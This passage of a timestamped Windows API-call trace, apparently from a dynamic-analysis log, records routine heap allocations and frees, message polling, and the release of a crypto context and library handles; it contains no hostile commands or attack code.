[0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0145.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.131] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0145.131] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0145.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0145.131] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0145.131] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0145.131] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0145.131] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0145.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0145.132] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0145.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0145.132] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0145.132] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0145.132] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0145.132] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0145.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0145.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0145.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0145.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0145.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0145.133] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0145.133] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0145.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0145.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0145.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0145.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0145.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0145.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0145.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0145.133] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0145.133] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0145.133] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0145.133] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0145.133] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0145.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0145.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ba8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0145.134] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0145.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0145.135] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.135] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0145.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0145.136] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0145.136] FreeLibrary (hLibModule=0x756e0000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0145.136] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0145.136] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0145.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0145.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0145.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0145.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0145.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0145.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0145.137] CloseHandle (hObject=0x2a0) returned 1 [0145.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0145.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0145.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0145.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0145.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0145.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0145.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0145.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0145.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0145.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0145.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0145.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0145.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0145.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0145.140] CloseHandle (hObject=0x2d0) returned 1 [0145.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0145.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0145.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0145.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0145.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0145.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0145.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0145.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0145.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0145.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0145.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0145.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0145.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0145.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0145.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0145.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0145.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0145.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0145.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: 